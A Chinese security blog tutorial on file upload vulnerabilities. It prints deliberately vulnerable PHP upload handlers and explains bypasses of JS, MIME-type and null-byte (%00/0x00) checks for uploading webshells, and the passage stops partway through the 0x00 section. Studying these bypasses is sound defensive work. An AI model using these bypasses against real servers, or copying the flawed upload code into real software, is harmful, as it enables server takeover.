<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>文件上传漏洞 | BaiKer</title><meta name="keywords" content="文件上传漏洞"><meta name="author" content="BaiKer"><meta name="copyright" content="BaiKer"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件 文件上传漏洞条件 上传的文">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传漏洞">
<meta property="og:url" content="http://baiker.top/0053789dab3b.html">
<meta property="og:site_name" content="BaiKer">
<meta property="og:description" content="文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件 文件上传漏洞条件 上传的文">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://inews.gtimg.com/newsapp_ls/0/13902964058/0">
<meta property="article:published_time" content="2021-04-19T09:05:47.000Z">
<meta property="article:modified_time" content="2022-10-06T13:13:21.098Z">
<meta property="article:author" content="BaiKer">
<meta property="article:tag" content="文件上传漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://inews.gtimg.com/newsapp_ls/0/13902964058/0"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://baiker.top/0053789dab3b"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
root: '/',
// Optional services; every one of them is switched off on this build.
algolia: undefined,
localSearch: undefined,
translate: undefined,
noticeOutdate: undefined,
// Code-block rendering flags. The "highlighjs" spelling is what the generator
// emitted; presumably the theme script compares it verbatim — verify before changing it.
highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
// Toast text for the copy-code button: success / error / browser unsupported.
copy: {
success: '复制成功',
error: '复制错误',
noSupport: '浏览器不支持'
},
// Presumably whether dates render as relative ("3 days ago") on the homepage / in posts.
relativeDate: {
homepage: false,
post: false
},
// Unit label ("day") for the site runtime counter.
runtime: '天',
// Suffixes for relative dates: just now / minutes ago / hours ago / days ago / months ago.
date_suffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
// Image lightbox implementation; the fancybox stylesheet is linked in <head>.
lightbox: 'fancybox',
Snackbar: undefined,
// Third-party assets fetched on demand. Plain CDN URLs, no integrity hash,
// so the page trusts whatever the CDN serves under these paths.
source: {
justifiedGallery: {
js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
}
},
isPhotoFigcaption: false,
islazyload: false,
isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
// Per-page flags emitted by the generator: this page is a post, not the
// homepage, and a table of contents is enabled (isHighlightShrink presumably
// controls collapsing of code blocks — confirm against the theme script).
// postUpdate matches the "更新于" timestamp shown in the post header.
title: '文件上传漏洞',
isPost: true,
isHome: false,
isHighlightShrink: false,
isToc: true,
postUpdate: '2022-10-06 21:13:21'
}</script><noscript><style type="text/css">
/* Fallback applied only when JavaScript is disabled (this <style> sits inside
   <noscript>): these elements are presumably shown by script otherwise, so
   force them visible here. */
#nav,
.justified-gallery img {
  opacity: 1;
}

#recent-posts time,
#post-meta time {
  display: inline !important;
}
</style></noscript><script>(win=>{
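win.saveToLocal = {
  // Persist `value` under `key` with an expiry `ttl` days from now.
  // ttl === 0 means "do not persist"; the call is then a no-op.
  set: function setWithExpiry(key, value, ttl) {
    if (ttl === 0) return
    const now = new Date()
    const expiryDay = ttl * 86400000 // days -> milliseconds
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },
  // Return the value stored under `key`, or undefined when the key is
  // missing, expired, unreadable, or not shaped like an entry written by
  // `set`. localStorage is writable by any script on the origin, so the
  // entry is treated as untrusted input: a malformed entry is dropped
  // instead of letting JSON.parse throw and abort the rest of this
  // inline script (which would skip theme and sidebar initialisation).
  get: function getWithExpiry(key) {
    let item
    try {
      const itemStr = localStorage.getItem(key)
      if (!itemStr) return undefined
      item = JSON.parse(itemStr)
    } catch (e) {
      // Storage unavailable (e.g. blocked) or corrupt JSON.
      return undefined
    }
    if (item === null || typeof item !== 'object' || typeof item.expiry !== 'number') {
      localStorage.removeItem(key)
      return undefined
    }
    const now = new Date()
    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}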
// Load an external script tag for `url`; resolves once the browser reports
// it loaded, rejects on a load error. The readyState branch only matters on
// old engines that report 'loaded'/'complete' instead of firing onload.
// NOTE(review): whatever is passed as `url` runs with full page privileges;
// callers are presumably limited to same-site or pinned CDN sources — confirm.
win.getScript = url => new Promise((resolve, reject) => {
  const tag = document.createElement('script')
  tag.src = url
  tag.async = true
  tag.onerror = reject
  const onDone = function () {
    const state = this.readyState
    const stillLoading = state && state !== 'loaded' && state !== 'complete'
    if (stillLoading) return
    tag.onload = tag.onreadystatechange = null
    resolve()
  }
  tag.onload = tag.onreadystatechange = onDone
  document.head.appendChild(tag)
})
// Switch the document to the dark theme and, when present, update the
// theme-color meta tag so the browser chrome matches.
win.activateDarkMode = function () {
  const root = document.documentElement
  root.setAttribute('data-theme', 'dark')
  const themeMeta = document.querySelector('meta[name="theme-color"]')
  if (themeMeta) {
    themeMeta.setAttribute('content', '#0d0d0d')
  }
}
// Switch the document to the light theme and, when present, update the
// theme-color meta tag so the browser chrome matches.
win.activateLightMode = function () {
  const root = document.documentElement
  root.setAttribute('data-theme', 'light')
  const themeMeta = document.querySelector('meta[name="theme-color"]')
  if (themeMeta) {
    themeMeta.setAttribute('content', '#ffffff')
  }
}
// Runs inline in <head>, so persisted preferences (theme, sidebar visibility)
// and the platform class are applied to <html> before the body is parsed.
const storedTheme = saveToLocal.get('theme')
if (storedTheme === 'dark') {
  activateDarkMode()
} else if (storedTheme === 'light') {
  activateLightMode()
}
const storedAside = saveToLocal.get('aside-status')
if (storedAside !== undefined) {
  // 'hide' adds the class, any other stored value removes it.
  document.documentElement.classList.toggle('hide-aside', storedAside === 'hide')
}
const markApple = () => {
  const ua = navigator.userAgent
  if (/iPad|iPhone|iPod|Macintosh/.test(ua)) {
    document.documentElement.classList.add('apple')
  }
}
markApple()
})(window)</script><meta name="referrer" content="no-referrer" /><link rel="stylesheet" href="https://baiker.top/css/essay.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Zfour/Butterfly-double-row-display@1.00/cardlistpost.css"/><meta name="generator" content="Hexo 5.4.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" 
href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://inews.gtimg.com/newsapp_ls/0/13902964058/0')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">BaiKer</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">文件上传漏洞</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-04-19T09:05:47.000Z" title="发表于 2021-04-19 17:05:47">2021-04-19</time><span class="post-meta-separator">|</span><i 
class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-10-06T13:13:21.098Z" title="更新于 2022-10-06 21:13:21">2022-10-06</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/">常规漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">8.4k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>37分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="文件上传漏洞"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><meta name="referrer" content="no-referrer" />
<h1 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h1><p> 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件</p>
<h2 id="文件上传漏洞条件"><a href="#文件上传漏洞条件" class="headerlink" title="文件上传漏洞条件"></a>文件上传漏洞条件</h2><ul>
<li>上传的文件可以被web服务器当作脚本来执行</li>
<li>我们可以访问上传文件的路径</li>
</ul>
<h2 id="服务器上传文件命名规则"><a href="#服务器上传文件命名规则" class="headerlink" title="服务器上传文件命名规则"></a>服务器上传文件命名规则</h2><ul>
<li>第一种:上传文件名和服务器命名一致</li>
<li>第二种:上传文件名和服务器命名不一致(随机,时间日期命名等),但是后缀一致</li>
<li>第三种:上传文件名和服务器命名不一致(随机,时间日期命名等),后缀不一致</li>
</ul>
<h2 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><p> 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。打个比方来说,如果你使用 php 作为服务器端的脚本语言,那么在你网站的上传功能处,就一定不能让用户上传 php 类型的文件,否则他上传一个木马文件,你服务器就被他控制了。因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。</p>
<p>一般我们会利用文件上传漏洞上传一句话木马,然后用工具连接获取 webshell。</p>
<p>但是这里有两个问题:</p>
<ul>
<li>第一你的文件能上传到web服务器,并且知道上传的路径</li>
<li>第二你的文件能被当成脚本文件执行,所以要想让上传文件被当成脚本执行,我们经常会和文件包含漏洞和文件解析漏洞一起利用</li>
</ul>
<h1 id="文件上传检测方式"><a href="#文件上传检测方式" class="headerlink" title="文件上传检测方式"></a>文件上传检测方式</h1><h2 id="客户端"><a href="#客户端" class="headerlink" title="客户端"></a>客户端</h2><h3 id="JS前端脚本检查"><a href="#JS前端脚本检查" class="headerlink" title="JS前端脚本检查"></a>JS前端脚本检查</h3><p> 前端检测文件扩展名。当客户端选择文件点击上传的时候,客户端还没有向服务器发送任何消息,前端的 js 脚本就对文件的扩展名进行检测来判断是否是可以上传的类型</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> file = <span class="built_in">document</span>.getElementsByName(<span class="string">'upload_file'</span>)[<span class="number">0</span>].value;</span><br><span class="line"> <span class="keyword">if</span> (file == <span class="literal">null</span> || file == <span class="string">""</span>) {</span><br><span class="line"> alert(<span class="string">"请选择要上传的文件!"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//定义允许上传的文件类型</span></span><br><span class="line"> <span class="keyword">var</span> allow_ext = <span class="string">".jpg|.png|.gif"</span>;</span><br><span class="line"> <span class="comment">//提取上传文件的类型</span></span><br><span class="line"> <span class="keyword">var</span> ext_name = file.substring(file.lastIndexOf(<span class="string">"."</span>));</span><br><span class="line"> <span class="comment">//判断上传文件类型是否允许上传</span></span><br><span class="line"> <span class="keyword">if</span> (allow_ext.indexOf(ext_name + <span class="string">"|"</span>) == -<span 
class="number">1</span>) {</span><br><span class="line"> <span class="keyword">var</span> errMsg = <span class="string">"该文件不允许上传,请上传"</span> + allow_ext + <span class="string">"类型的文件,当前文件类型为:"</span> + ext_name;</span><br><span class="line"> alert(errMsg);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<ol>
<li>直接禁用JavaScript实现绕过</li>
</ol>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gptrxttva6j30mn01rq2t.jpg"></p>
<ol start="2">
<li>先把文件扩展名改成允许上传的文件类型,再利用burp suite抓包改成自己想要的文件类型,即可绕过</li>
</ol>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gptrxtwi0xj30le04xjsh.jpg"></p>
<p>找到上传地址</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gptrxtxuonj30g3038jrp.jpg"></p>
<p>用工具连接即可</p>
<h2 id="服务端"><a href="#服务端" class="headerlink" title="服务端"></a>服务端</h2><h3 id="检查后缀"><a href="#检查后缀" class="headerlink" title="检查后缀"></a>检查后缀</h3><h4 id="白名单"><a href="#白名单" class="headerlink" title="白名单"></a>白名单</h4><h5 id="MIME绕过"><a href="#MIME绕过" class="headerlink" title="MIME绕过"></a>MIME绕过</h5><p>MIME (Multipurpose Internet Mail Extensions) 是描述消息内容类型的因特网标准</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="keyword">if</span> ((<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/jpeg'</span>) || (<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/png'</span>) || (<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>] == <span class="string">'image/gif'</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = 
UPLOAD_PATH . <span class="string">'/'</span> . <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>] </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'文件类型不正确,请重新上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH.<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>服务端主要检查数据包中声明的 MIME 类型,将 Content-Type 改为 image/jpeg 即可</p>
<div class="tabs" id=""><ul class="nav-tabs"><li class="tab active"><button type="button" data-href="#-1">修改之前</button></li><li class="tab"><button type="button" data-href="#-2">修改之后</button></li></ul><div class="tab-contents"><div class="tab-item-content active" id="-1"><p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gptrxtwe87j30i7049gmh.jpg"></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div><div class="tab-item-content" id="-2"><p>把 Content-Type: application/octet-stream</p>
<p>改成 Content-Type: image/jpeg</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gptrxtp5g1j30jw048gmh.jpg"></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div></div></div>
<h5 id="00截断"><a href="#00截断" class="headerlink" title="%00截断"></a>%00截断</h5><p>无论是%00还是0x00,最终被解析之后都表示ASCII码中的0,而ASCII码中的0作为特殊字符保留,代表NULL,表示空字符,当一个字符串中存在空字符的时候,在被解析的时候就会导致空字符后面的字符被丢弃</p>
<p>%00代表着url的转换,通常用于get传参的00截断</p>
<p>PHP 版本 &lt; 5.3.4 时会出现这种情况</p>
<p>且要关闭参数<code>magic_quotes_gpc</code>,设置为OFF</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = substr(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span 
class="line"> <span class="variable">$img_path</span> = <span class="variable">$_GET</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>在这里发现文件上传的路径是可控的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$img_path</span> = <span class="variable">$_GET</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br></pre></td></tr></table></figure>
<p>保存文件时是将get得到的路径与随机数年月日和上传文件名拼接到一起,所以上传文件路径可控,我们将get的路径最后改为<code>test.php0x00</code>那么拼接到后面的内容就会被丢弃。</p>
<div class="tabs" id=""><ul class="nav-tabs"><li class="tab active"><button type="button" data-href="#-1">修改之前</button></li><li class="tab"><button type="button" data-href="#-2">修改之后</button></li></ul><div class="tab-contents"><div class="tab-item-content active" id="-1"><p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5r2rekkwj31050hfdkv.jpg" alt="文件上传-00截断1.png"></p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div><div class="tab-item-content" id="-2"><p>在url路径后面写入<code>test.php%00</code></p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5r4txbw9j30zq0dcjuj.jpg" alt="文件上传-00截断2.png"></p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gq5rjhb6igj30do0203yn.jpg" alt="文件上传-00截断3.png"></p>
<p>上传之后直接访问<code>/upload/test.php</code>即可</p><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div></div></div>
<h5 id="0x00截断"><a href="#0x00截断" class="headerlink" title="0x00截断"></a>0x00截断</h5><p>无论是%00还是0x00,最终被解析之后都表示ASCII码中的0,而ASCII码中的0作为特殊字符保留,代表NULL,表示空字符,当一个字符串中存在空字符的时候,在被解析的时候就会导致空字符后面的字符被丢弃</p>
<p>0x00通常用于post传参的00截断</p>
<p>PHP 版本 &lt; 5.3.4 时会出现这种情况</p>
<p>且要关闭参数<code>magic_quotes_gpc</code>,设置为OFF</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = substr(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span 
class="line"> <span class="variable">$img_path</span> = <span class="variable">$_POST</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传失败"</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>在这里发现文件上传的路径是可控的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$img_path</span> = <span class="variable">$_POST</span>[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br></pre></td></tr></table></figure>
<p>这次是使用post进行上传,在这里对二进制进行修改</p>
